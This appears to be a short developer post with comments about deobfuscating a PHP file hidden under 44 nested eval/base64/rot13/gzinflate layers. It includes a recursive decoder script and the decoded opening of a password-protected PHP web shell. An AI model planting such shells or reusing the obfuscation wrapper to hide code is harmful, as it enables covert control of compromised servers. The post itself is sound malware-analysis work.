Fighting inception obfuscation

1.php

<?php 
// I got this file once
eval(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>

2.php

<?php
// obviously I didn't want it to eval(), so to deobfuscate it i simply did:
print(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>

2.txt

and....

$ php 2.php
eval(gzinflate(str_rot13(base64_decode('HJ23juvIFlI/5w3AgN6F9N57JgPRey...59.5KB.of.code..=')

$ oh crap
-bash: oh: command not found

$ php 2.php > 3.php
$ joe 3.php
<editing...> 

$ php 3.php
eval(gzinflate(str_rot13(base64_decode('HJ23juvIFlI/5w3AgN6F9N57JgPRey...59KB.of.code..=')

Friggin inceptions! there might be many of them...

deception.php

<?php
// and this is how you handle this
function t($code) {
  echo "."; // just to detect how many inceptions there were
  $code = str_rot13(base64_decode($code));
  $code = gzinflate($code);
  $m = array();
  if (preg_match('/str_rot13\(base64_decode\(\'(.+)\'\)/', $code, $m)) {
    return t($m[1]);
  }
  return $code;
}

$code = 'HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=';

print(t($code));

deception.txt

$ php deception.php | head
............................................ // 44 inceptions!
@session_start();@set_time_limit(0);@$pass = $_POST['pass'];$chk_login = true;$password = "tampan";if($pass == $password){$_SESSION['nst'] = "$pass";}if($chk_login == true){if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password){die("<title>.::[ Yogyacarderlink Area ]::.</title><body style=margin:0px;><table border=0 cellpadding=0 cellspacing=0 width=100% height=100% bgcolor=black><tr><td valign=middle align=center><table cellpadding=2 cellspacing=2 width=100 bgcolor=black style='border:1px solid #FFFF00;'><tr><td><table width=100 bgcolor=black style='border:1px dashed #FFFF00;'><tr><td><form method=post><font size=1 face=verdana color=white><b><center>-:: Wellcome to Private sHell ::-</center></b><hr style='border:1px dashed #FFFF00;'><center><input type=password name=pass size=30><br><br><input type=submit value=GO style='background-color: #000000; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: #CCCCCC; border-right-color: #999999; border-bottom-color: #999999; border-left-color: #CCCCCC; color: #FFFFFF;'></center></form><b>Host :</b> ".$_SERVER["HTTP_HOST"]."<br><b>IP :</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br><b>Your IP :</b> ".$_SERVER["REMOTE_ADDR"]."</font></td></tr></table></tr></td></table></td></tr></table></body>");}}$language='eng';error_reporting(0);set_magic_quotes_runtime(0);@set_time_limit(0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);$safe_mode = @ini_get('safe_mode');$version = "denzjhoena Private sHell";if(version_compare(phpversion(), '4.1.0') == -1){$_POST   = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;$_SERVER = &$HTTP_SERVER_VARS;}if (@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}foreach ($_SERVER as $k=>$v){$_SERVER[$k] = stripslashes($v);}}
$head = '
<html>
<head>
<title>[ ? ] denzjhoena shell [ ? ]</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {

Of course, under 44 layers of obfuscation there was a PHP shell script...

so, that's 44 layers total, not including the two attempts at the beginning?

also, they didn't try to change the obfuscation methods throughout? that's surprising.

yeah, 44 in total, all steps were the same.